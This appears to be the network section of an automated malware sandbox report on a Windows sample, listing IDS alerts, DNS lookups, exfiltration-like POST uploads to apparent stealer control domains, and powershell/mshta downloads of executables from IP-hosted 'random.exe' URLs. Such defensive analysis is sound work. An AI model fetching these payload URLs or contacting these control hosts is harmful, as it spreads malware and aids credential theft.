                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49775 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49777 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49779 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49782 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49780 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49785 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49787 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49790 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49792 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49791 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49793 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49794 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49795 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49799 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49789 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49783 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49784 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49798 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49801 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49806 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49809 -> 23.204.173.220:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49813 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49815 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49804 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49816 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49819 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49822 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49821 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49823 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49826 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49828 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49830 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49833 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49797 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49818 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49824 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49827 -> 185.215.113.75:80
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=lcQ9uIW458FEFTm.xe2g6dQ101_VdmFq11BRz9qd6f8-1739262013-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SW6T4879RJCL8GGJSBMCookie: __cf_mw_byp=lcQ9uIW458FEFTm.xe2g6dQ101_VdmFq11BRz9qd6f8-1739262013-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20542Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AL781BLZ4H9MN72Cookie: __cf_mw_byp=lcQ9uIW458FEFTm.xe2g6dQ101_VdmFq11BRz9qd6f8-1739262013-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 10915Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=52CFWCG38EV9K7BP2Cookie: __cf_mw_byp=lcQ9uIW458FEFTm.xe2g6dQ101_VdmFq11BRz9qd6f8-1739262013-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20556Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0X38G6Z89JUDCookie: __cf_mw_byp=lcQ9uIW458FEFTm.xe2g6dQ101_VdmFq11BRz9qd6f8-1739262013-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2372Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XZMJZK99I9IO99YY1XCookie: __cf_mw_byp=lcQ9uIW458FEFTm.xe2g6dQ101_VdmFq11BRz9qd6f8-1739262013-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1084926Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=lcQ9uIW458FEFTm.xe2g6dQ101_VdmFq11BRz9qd6f8-1739262013-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=aB6oJQh0IRP76S0M5BYMUt.XtfpG8EylzS5DW_BWSag-1739262039-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SM6LVPB8ZCookie: __cf_mw_byp=aB6oJQh0IRP76S0M5BYMUt.XtfpG8EylzS5DW_BWSag-1739262039-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20486Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LSXOJICKM30MJ9Cookie: __cf_mw_byp=aB6oJQh0IRP76S0M5BYMUt.XtfpG8EylzS5DW_BWSag-1739262039-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 10913Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=II1P3KK6CXCookie: __cf_mw_byp=aB6oJQh0IRP76S0M5BYMUt.XtfpG8EylzS5DW_BWSag-1739262039-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20518Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DILHQQ7ZMN4HDCookie: __cf_mw_byp=aB6oJQh0IRP76S0M5BYMUt.XtfpG8EylzS5DW_BWSag-1739262039-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2411Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: paleboreei.biz
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=GQ.kL6RJhyRI23KH932kfu8cX.U_Ps1j.uPaPdl1a_w-1739262045-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: paleboreei.biz
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4MT5C9RK59HACR4Cookie: __cf_mw_byp=aB6oJQh0IRP76S0M5BYMUt.XtfpG8EylzS5DW_BWSag-1739262039-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1084913Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SBJ7TWOQS9FZDCookie: __cf_mw_byp=GQ.kL6RJhyRI23KH932kfu8cX.U_Ps1j.uPaPdl1a_w-1739262045-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20514Host: paleboreei.biz
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GZH6OSWALL1Cookie: __cf_mw_byp=GQ.kL6RJhyRI23KH932kfu8cX.U_Ps1j.uPaPdl1a_w-1739262045-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 10899Host: paleboreei.biz
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T8QHKRYDP0HZ4Cookie: __cf_mw_byp=GQ.kL6RJhyRI23KH932kfu8cX.U_Ps1j.uPaPdl1a_w-1739262045-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20540Host: paleboreei.biz
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1XDA6P1UOZO1UTWF9UDCookie: __cf_mw_byp=GQ.kL6RJhyRI23KH932kfu8cX.U_Ps1j.uPaPdl1a_w-1739262045-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2453Host: paleboreei.biz
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=aB6oJQh0IRP76S0M5BYMUt.XtfpG8EylzS5DW_BWSag-1739262039-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: importenptoc.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CY1CDBJDJEFYBJTP2FICookie: __cf_mw_byp=GQ.kL6RJhyRI23KH932kfu8cX.U_Ps1j.uPaPdl1a_w-1739262045-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1094298Host: paleboreei.biz
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=GQ.kL6RJhyRI23KH932kfu8cX.U_Ps1j.uPaPdl1a_w-1739262045-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: paleboreei.biz
                                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.204.150.28
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.204.150.28
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009DCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_009DCE44
                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/LostRobotic/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/7244183739/L5shRfh.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Sun, 09 Feb 2025 11:32:34 GMTIf-None-Match: "67a89252-1fa800"
                                Source: global trafficHTTP traffic detected: GET /files/5957639473/8OH46ok.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/6158422886/r7MRNUY.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/7133380843/X7kkUXr.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/563390996/0l1LuE1.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22371276819.0000000005A07000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22339534051.0000000005A08000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22372492853.0000000005A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                                Source: f891ed3167.exe, 00000026.00000002.22708013785.00000000013DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com= equals www.facebook.com (Facebook)
                                Source: global trafficDNS traffic detected: DNS query: rebeldettern.com
                                Source: global trafficDNS traffic detected: DNS query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC
                                Source: global trafficDNS traffic detected: DNS query: cozyhomevpibes.cyou
                                Source: global trafficDNS traffic detected: DNS query: importenptoc.com
                                Source: global trafficDNS traffic detected: DNS query: paleboreei.biz
                                Source: global trafficDNS traffic detected: DNS query: edcatiofireeu.shop
                                Source: global trafficDNS traffic detected: DNS query: impolitewearr.biz
                                Source: global trafficDNS traffic detected: DNS query: toppyneedus.biz
                                Source: global trafficDNS traffic detected: DNS query: lightdeerysua.biz
                                Source: global trafficDNS traffic detected: DNS query: suggestyuoz.biz
                                Source: global trafficDNS traffic detected: DNS query: hoursuhouy.biz
                                Source: global trafficDNS traffic detected: DNS query: mixedrecipew.biz
                                Source: global trafficDNS traffic detected: DNS query: affordtempyo.biz
                                Source: global trafficDNS traffic detected: DNS query: pleasedcfrown.biz
                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: actiothreaz.com
                                Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                                Source: global trafficDNS traffic detected: DNS query: www.google.com
                                Source: global trafficDNS traffic detected: DNS query: apis.google.com
                                Source: global trafficDNS traffic detected: DNS query: play.google.com
                                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rebeldettern.com
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 11 Feb 2025 08:20:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=913dleUdc%2FrpdnBe1MAzX9VkHocGKc0E1H8zWTN71fzDaq02aMZnvATjd4r93vA9Hqahi4MYR64HFzGtwpFPIvM8%2FFM2WNpl7v9mUwJDoVI2mN46NeMZQDsS1TFYsnFLgwNF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9102eb1e9e852ab7-LAX
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 11 Feb 2025 08:20:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6FMXhF%2ByaQ7FQN9EM0pYOu95Ha5xhJuEzVIIIqyqrDxLn%2BZlRzi8Fg%2B2sPjKzkCZWNrvX3Qs0nnp393lk3zXPAHhCNOJ6nRrBEKQxHrg4bbJ%2F4U02tT7xlTEDn8JRZEJXoD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9102ebc4adfa5337-LAX
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 11 Feb 2025 08:20:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKStEyhcSMd7m7F%2FsVaytk61k9sf2xOYT1PHZa5cwjJI6PM9DlZiHXdIBEwTCUOBVglh6pbmdkbA9CgpCe%2BEvjfSJPPvY5wyYKINiyKKmRDO5x8BYV6Jf6btwnVbRZ7moQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9102ebea39aa0fff-LAX
                                Source: powershell.exe, 00000006.00000002.22120325599.0000000007267000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.22082133995.000001790920A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.22083296725.000001790920A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.22078225983.000001790920A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.1
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16
                                Source: powershell.exe, 00000009.00000002.22087709079.000001D32C1E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                                Source: powershell.exe, 00000006.00000002.22105137448.0000000004C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe4
                                Source: powershell.exe, 00000009.00000002.22087972626.000001D32C935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exeXz
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001047000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23306638646.0000000005C58000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000003.23137775135.0000000001085000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23306638646.0000000005C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpE
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpI
